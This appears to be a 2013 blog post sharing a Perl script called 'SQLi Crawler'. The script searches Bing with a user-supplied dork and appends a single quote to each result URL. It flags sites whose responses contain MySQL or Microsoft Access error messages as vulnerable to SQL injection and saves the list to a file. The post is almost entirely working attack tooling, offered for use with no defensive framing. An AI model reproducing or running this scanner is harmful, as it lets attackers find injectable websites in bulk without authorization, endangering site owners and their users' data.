Friday, 18 January 2013

Perl SQLi Crawler

10:19    No comments



#!/usr/bin/perl

use strict;
use warnings;
use HTTP::Request;
use LWP::UserAgent;

###############
my $dork;
my $url;
my $i;
my $request;
my $useragent;
my $response;
my $start;
my $end;
my $result;
my $fl;
my $link;
my $req;
my $ua;
my $result2;
my $res;
my $save;
my $pages;
my $page;
my $choice;
##############
my @z;

print q{
     _ ____        _  
    | |  _ \      | | 
  __| | |_) | ___ | |_
 / _` |  _ < / _ \| __|
| (_| | |_) | (_) | |_
 \__,_|____/ \___/ \__|
                          
################################
##      / SQLi Crawler /      ##
##      Private Edition       ##
##      ~Coded by dbx~        ##
################################

};

MainMenu:

print "------------------------\n";
print "Enter [1] To Begin SQLi.\n";
print "Enter [2] To Exit.\n";
print "------------------------\n\n";
print "Your Choice: ";

chomp ($choice = <STDIN>);
print "\n";

if ($choice eq 1) {&sql_scan}
if ($choice eq 5) {die;}

sub sql_scan
{

print "[+] Enter Bing! dork: ";
chomp ($dork = <STDIN>);
print "\n";
print "[+] How Many Pages To Leech?: ";
chomp ($pages = <STDIN>);
print "\n";

$page = $pages.'1';

print "[~] Crawling...\n\n";

for ($i = 0; $i <= $page; $i=$i+11)
{

$url = "http://www.bing.com/search?q=$dork&go=&qs=n&sk=&sc=8-13&first=$i";

$request = HTTP::Request->new(GET => $url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
$result = $response->content;

$start = '<h3><a href="';
$end = '" onmousedown=';

while ($result =~ m/$start(.*?)$end/g)

{
     $fl = $1;
     $link = $fl."%27";
     $req = HTTP::Request->new(GET => $link);
     $ua = LWP::UserAgent->new();
     $res = $ua->request($req);
     $result2 = $res->content;

      if ($result2=~ m/You have an error in your SQL syntax/i || $result2=~ m/Query failed/i || $result2=~ m/SQL query failed/i || $result2=~ m/mysql_fetch_/i || $result2=~ m/mysql_fetch_array/i || $result2 =~ m/mysql_num_rows/i || $result2 =~ m/The used SELECT statements have a different number of columns/i )
      {
          push @z, $link;
          print "[+] MySQL Vulnerable: $link\n\n";
      }

      elsif ($result2 =~ m/Microsoft JET Database/i || $result2 =~ m/ODBC Microsoft Access Driver/i )
      {
          push @z, $link;
          print "[+] MsSQL Vulnerable: $link\n\n";
      }

      else {
         
              print "[-] $link <- Not Vulnerable\n\n";
      }
}

}
    print "Vulnerable Links:\n";
    print "-----------------------------------\n";
foreach (@z)
{
    print "$_ \n\n";
}
print "Save Into A Text File? (Y or N): ";
chomp ($save = <STDIN>);

if ($save eq 'Y')
{
    print "Saving File...\n\n";
    open(vuln_file, ">>Vulns.txt");
    foreach (@z)
    {
        print vuln_file "$_ \n";
    }
    close(vuln_file);
    print "File Saved!\n\n";
}
goto MainMenu;
}

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)